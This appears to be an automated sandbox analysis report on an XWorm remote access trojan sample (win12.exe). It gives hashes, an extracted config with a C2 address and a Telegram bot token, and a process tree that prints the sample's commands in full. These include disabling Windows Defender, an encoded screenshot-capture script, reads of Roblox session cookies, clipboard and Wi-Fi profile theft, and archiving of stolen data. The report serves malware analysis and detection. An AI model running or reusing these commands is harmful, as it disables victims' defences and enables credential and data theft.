Analysis

  • max time kernel
    107s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 18:39

General

  • Target

    win12.exe

  • Size

    7.8MB

  • MD5

    1f9e89517854258c99877b23abe2e045

  • SHA1

    bddfa736ca2b22faa1e566f365c38f28b806bc95

  • SHA256

    6f32596ebd4cb3ac5feb00f1b3f71ed03eb28db04df44d878c6531240b1f3171

  • SHA512

    9659bf4f6d515e0338af4ada26d2bb31e2eb046f0ac9811b5d509c2edfa0d64957efcf53a0fb3c484b45469b9d7ff759eb268b4d478e0205e3bf7a9f6af36672

  • SSDEEP

    196608:45/HYUwfI9jUCzi4H1qSiXLGVi7DMgpZ3QJVM9QwCEc/jM:iYIHziK1piXLGVE4UeJV5g

Malware Config

Extracted

Family

xworm

Version

5.0

C2

154.216.19.12:7000

Mutex

NuXVPKhDBKHTLExY

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • A potential corporate email address has been identified in the URL: FluxJacker@mrfluxdevNewCLientFBB2DBF07DEA74533A82UserNameAdminOSFullNameMicrosoftWindows10ProUSBFalseCPUIntelCoreProcessorBroadwellGPUMicrosoftBasicDisplayAdapterRAMErrorGroupFJv1snew
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 4 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\win12.exe
    "C:\Users\Admin\AppData\Local\Temp\win12.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Users\Admin\AppData\Local\Temp\win12.exe
      "C:\Users\Admin\AppData\Local\Temp\win12.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\win12.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4576
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\win12.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:636
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4588
          • C:\Users\Admin\AppData\Local\Temp\kbldrk.exe
            "C:\Users\Admin\AppData\Local\Temp\kbldrk.exe"
            5⤵
            • Executes dropped EXE
            PID:1656
            • C:\Users\Admin\AppData\Local\Temp\kbldrk.exe
              "C:\Users\Admin\AppData\Local\Temp\kbldrk.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2380
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kbldrk.exe'"
                7⤵
                  PID:4020
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kbldrk.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3200
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                  7⤵
                    PID:3952
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:868
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()""
                    7⤵
                      PID:4668
                      • C:\Windows\system32\mshta.exe
                        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()"
                        8⤵
                          PID:1804
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍  .scr'"
                        7⤵
                          PID:4836
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍  .scr'
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:876
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          7⤵
                            PID:4568
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              8⤵
                              • Enumerates processes with tasklist
                              PID:4936
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            7⤵
                              PID:4420
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                8⤵
                                • Enumerates processes with tasklist
                                PID:740
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                              7⤵
                                PID:2716
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  8⤵
                                    PID:3832
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  7⤵
                                  • Clipboard Data
                                  PID:524
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-Clipboard
                                    8⤵
                                    • Clipboard Data
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1076
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  7⤵
                                    PID:3124
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist /FO LIST
                                      8⤵
                                      • Enumerates processes with tasklist
                                      PID:5100
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    7⤵
                                      PID:2432
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        8⤵
                                          PID:4132
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                        7⤵
                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                        PID:2472
                                        • C:\Windows\system32\netsh.exe
                                          netsh wlan show profile
                                          8⤵
                                          • Event Triggered Execution: Netsh Helper DLL
                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                          PID:5208
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                        7⤵
                                          PID:1196
                                          • C:\Windows\system32\systeminfo.exe
                                            systeminfo
                                            8⤵
                                            • Gathers system information
                                            PID:5004
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                          7⤵
                                            PID:3656
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                              8⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5160
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14kjvd2i\14kjvd2i.cmdline"
                                                9⤵
                                                  PID:5596
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES34E6.tmp" "c:\Users\Admin\AppData\Local\Temp\14kjvd2i\CSCA9EA646B4DE041D7BA3213275DAA523.TMP"
                                                    10⤵
                                                      PID:5648
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                7⤵
                                                  PID:5260
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    8⤵
                                                      PID:5428
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    7⤵
                                                      PID:5452
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        8⤵
                                                          PID:5524
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        7⤵
                                                          PID:5544
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            8⤵
                                                              PID:5696
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            7⤵
                                                              PID:5720
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                8⤵
                                                                  PID:5784
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                7⤵
                                                                  PID:5796
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    8⤵
                                                                      PID:5848
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    7⤵
                                                                      PID:6056
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        8⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:6112
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                      7⤵
                                                                        PID:468
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          8⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:2524
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                                        7⤵
                                                                          PID:5396
                                                                          • C:\Windows\system32\getmac.exe
                                                                            getmac
                                                                            8⤵
                                                                              PID:5528
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16562\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\M5JjA.zip" *"
                                                                            7⤵
                                                                              PID:5456
                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI16562\rar.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI16562\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\M5JjA.zip" *
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:5232
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                              7⤵
                                                                                PID:5576
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic os get Caption
                                                                                  8⤵
                                                                                    PID:2516
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                  7⤵
                                                                                    PID:2292
